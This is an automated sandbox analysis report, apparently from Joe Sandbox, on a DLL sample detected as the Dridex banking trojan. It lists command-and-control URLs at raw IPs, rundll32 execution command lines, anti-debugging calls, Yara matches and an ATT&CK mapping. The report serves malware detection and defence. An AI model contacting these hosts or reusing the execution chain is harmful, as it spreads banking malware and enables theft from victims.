                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47/
                      Source: loaddll32.exe, 00000000.00000003.811547591.000000000142C000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47/F
                      Source: loaddll32.exe, 00000000.00000003.811547591.000000000142C000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47/N
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1096183295.000000000142B000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/
                      Source: loaddll32.exe, 00000000.00000003.904619445.0000000001429000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/%
                      Source: loaddll32.exe, 00000000.00000003.837199003.000000000142B000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/&
                      Source: loaddll32.exe, 00000000.00000003.1096183295.000000000142B000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/0
                      Source: loaddll32.exe, 00000000.00000003.806428262.000000000142C000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/4.140.214:808/
                      Source: loaddll32.exe, 00000000.00000003.1045448367.000000000142B000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/853
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/C
                      Source: loaddll32.exe, 00000000.00000003.1096183295.000000000142B000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/D
                      Source: loaddll32.exe, 00000000.00000003.904619445.0000000001429000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/ES
                      Source: loaddll32.exe, 00000000.00000003.828785020.000000000142B000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/P
                      Source: loaddll32.exe, 00000000.00000003.953795452.0000000001429000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/Ps%
                      Source: loaddll32.exe, 00000000.00000003.995531404.0000000001428000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/oft
                      Source: loaddll32.exe, 00000000.00000003.1012124189.000000000142B000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.1192983673.000000000142B000.00000004.00000020.sdmp, loaddll32.exe, 00000000.00000003.1045448367.000000000142B000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1178896990.000000000142B000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/soft
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1012124189.000000000142B000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.970321561.0000000001429000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.1194600161.000000000514E000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/#
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/$
                      Source: loaddll32.exe, 00000000.00000003.920743516.0000000001429000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/)
                      Source: loaddll32.exe, 00000000.00000003.1012124189.000000000142B000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/-
                      Source: loaddll32.exe, 00000000.00000002.1192983673.000000000142B000.00000004.00000020.sdmpString found in binary or memory: https://192.46.210.220/1
                      Source: loaddll32.exe, 00000000.00000003.937380465.0000000001429000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/5
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/9
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1012124189.000000000142B000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/Certification
                      Source: loaddll32.exe, 00000000.00000003.1012124189.000000000142B000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/E
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1096183295.000000000142B000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/GlobalSign
                      Source: loaddll32.exe, 00000000.00000003.1012124189.000000000142B000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/Google
                      Source: loaddll32.exe, 00000000.00000003.1012124189.000000000142B000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/L
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/N
                      Source: loaddll32.exe, 00000000.00000003.1012124189.000000000142B000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/O
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/W
                      Source: loaddll32.exe, 00000000.00000003.904619445.0000000001429000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/aenh.dll
                      Source: loaddll32.exe, 00000000.00000003.828785020.000000000142B000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/aenh.dllz
                      Source: loaddll32.exe, 00000000.00000003.1012124189.000000000142B000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/coro8
                      Source: loaddll32.exe, 00000000.00000003.1096183295.000000000142B000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/i
                      Source: loaddll32.exe, 00000000.00000003.1012124189.000000000142B000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1096183295.000000000142B000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.1192983673.000000000142B000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000002.1194600161.000000000514E000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/ography
                      Source: loaddll32.exe, 00000000.00000003.855700484.000000000142B000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/r
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96/
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1096183295.000000000142B000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.860275635.000000000142A000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.1194600161.000000000514E000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/
                      Source: loaddll32.exe, 00000000.00000003.1045448367.000000000142B000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.1194600161.000000000514E000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/.0.96:6891/
                      Source: rundll32.exe, 00000003.00000002.1192429006.000000000099C000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/1$
                      Source: loaddll32.exe, 00000000.00000003.860275635.000000000142A000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/C
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1045448367.000000000142B000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.953795452.0000000001429000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/Microsoft
                      Source: rundll32.exe, 00000003.00000002.1194600161.000000000514E000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/graphy
                      Source: rundll32.exe, 00000003.00000002.1194600161.000000000514E000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/h.dlln
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4F39F9 InternetReadFile,
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.4:49760 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.4:49772 version: TLS 1.2

                      E-Banking Fraud:

                      barindex
                      Yara detected Dridex unpacked fileShow sources
                      Source: Yara matchFile source: 3.3.rundll32.exe.2f5db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.468db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.113db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e4c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.468db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.113db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.445db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.2d5db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.2f5db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e4c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.445db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.2d5db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.1194868368.000000006E4C1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.766529856.0000000002F40000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.765489662.0000000004670000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.779791327.0000000002D40000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.790137281.0000000001120000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1193417410.000000006E4C1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.787445513.0000000004440000.00000040.00000001.sdmp, type: MEMORY
                      Detected Dridex e-Banking trojanShow sources
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4C51A7 OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,
                      Source: SecuriteInfo.com.Variant.Razy.980776.5008.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4D67C8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4E1240
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4DA660
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4E7660
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4E2E60
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4C9E70
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4D9E70
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4CCA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4EFA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4E0220
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4ED620
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4EFA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4E3EC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4C6AD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4D96D0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4DF6E0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4D8EF0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4DB6F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4E62F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4DAE80
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4D8AB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4E26B0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4E1EB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4DBF50
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4D5B60
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4CAF7F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4E3B00
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4E9B10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4E1730
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4D83C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4D7FC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4E7FC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4DE3F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4C1784
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4E1020
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4DD030
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4D88C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4D8CC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4D98DA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4DA0D0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4DE0A0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4E4CA0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4E50A0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4EDCA0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4E5CB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4D7564
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4DFDD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4E89F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4E71F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4DD980
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4ED180
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4DC590
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4CF9A0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4D22A0 NtDelayExecution,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4EBE30 NtClose,
                      Source: SecuriteInfo.com.Variant.Razy.980776.5008.dllReversingLabs: Detection: 20%
                      Source: SecuriteInfo.com.Variant.Razy.980776.5008.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll,Bluewing
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll,Earth
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll,Masterjust
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll,Bluewing
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll,Earth
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll,Masterjust
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                      Source: classification engineClassification label: mal84.bank.troj.evad.winDLL@11/2@0/4
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll,Bluewing
                      Source: SecuriteInfo.com.Variant.Razy.980776.5008.1370Joe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: SecuriteInfo.com.Variant.Razy.980776.5008.dllStatic file information: File size 1375232 > 1048576
                      Source: SecuriteInfo.com.Variant.Razy.980776.5008.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: SecuriteInfo.com.Variant.Razy.980776.5008.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: c:\Gun\208-town\521\exa\botto\party.pdb source: loaddll32.exe, 00000000.00000002.1193920617.000000006E587000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1195365441.000000006E587000.00000002.00020000.sdmp, SecuriteInfo.com.Variant.Razy.980776.5008.dll
                      Source: C:\Windows\System32\loaddll32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                      Source: C:\Windows\System32\loaddll32.exeCode function: OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4D3930 GetTokenInformation,GetTokenInformation,GetSystemInfo,GetTokenInformation,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4ECEF8 FindFirstFileExW,
                      Source: loaddll32.exe, 00000000.00000002.1192967377.000000000141E000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E5397B0 IsDebuggerPresent,IsDebuggerPresent,CreateThread,std::_Timevec::_Timevec,WaitForSingleObjectEx,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E538B60 __invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__cftoe,__aligned_msize,__invoke_watson_if_error,GetFileType,WriteConsoleW,GetLastError,__cftoe,WriteFile,WriteFile,OutputDebugStringW,__invoke_watson_if_error,__CrtDbgReportWV,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E5347C0 mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E60BA72 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E60B64D push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E60B942 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4D6C50 KiUserExceptionDispatcher,LdrLoadDll,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4D7A60 RtlAddVectoredExceptionHandler,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E5063A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.77.0.96 235
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.56.219.47 180
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.46.210.220 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 143.244.140.214 40
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll',#1
                      Source: loaddll32.exe, 00000000.00000002.1193139595.0000000001BE0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1193661861.00000000033E0000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: loaddll32.exe, 00000000.00000002.1193139595.0000000001BE0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1193661861.00000000033E0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.1193139595.0000000001BE0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1193661861.00000000033E0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.1193139595.0000000001BE0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1193661861.00000000033E0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetACP,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4D2980 GetUserNameW,

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection112Process Injection112OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRundll321LSASS MemorySecurity Software Discovery21Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSAccount Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsSystem Owner/User Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol13Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Network Configuration Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemFile and Directory Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Information Discovery23Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      SecuriteInfo.com.Variant.Razy.980776.5008.dll20%ReversingLabsWin32.Worm.Cridex

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://143.244.140.214:808/hy0%URL Reputationsafe
                      https://192.46.210.220/Google0%Avira URL Cloudsafe
                      https://143.244.140.214:808/00%Avira URL Cloudsafe
                      https://143.244.140.214:808/10%Avira URL Cloudsafe
                      https://192.46.210.220/aenh.dll0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/0%URL Reputationsafe
                      https://192.46.210.220/Certification0%URL Reputationsafe
                      https://45.77.0.96:6891/.0.96:6891/0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/&0%Avira URL Cloudsafe
                      https://45.77.0.96/0%URL Reputationsafe
